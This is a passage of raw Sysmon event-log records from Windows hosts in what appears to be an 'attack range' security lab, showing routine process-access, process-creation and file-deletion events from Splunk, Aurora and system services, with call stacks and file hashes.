Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016075Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016074Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016073Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016072Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016071Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016070Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016069Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016068Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.455{E5A8D418-E40E-63C7-F701-00000000B002}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016067Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.329{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99CFD1BCEA147AA14824C49C44BB9385,SHA256=5C657BE06DE33B109BEE196193F95F66FB7E807BD048AF8C18AD89666C0DC260,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016066Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.079{E5A8D418-E40D-63C7-F601-00000000B002}18962360C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.905{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000041368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.893{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=D131F083030F5EF9A97E3BEEA72DB422,SHA256=EB21AB939C45AEBB2B9363AD8EB0405BD470DB8319AD338C5A34ED9C2FCD591F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.893{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_QS2VmbU54epPZXDMD5=34E4E11D25DD7704B7C6ABF73FD9819D,SHA256=DADB738618D3D9EFB35484AD30BE56240ECC0E503EDBF1D9B11786FDB29CAAB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.883{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=D0B7B22DD641BAA85EA7BCF9E7B7699F,SHA256=DAE10F49CD50EEAF3E851AB278684950A06725BA61F585113A2180057BE9915E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.882{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.773{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program 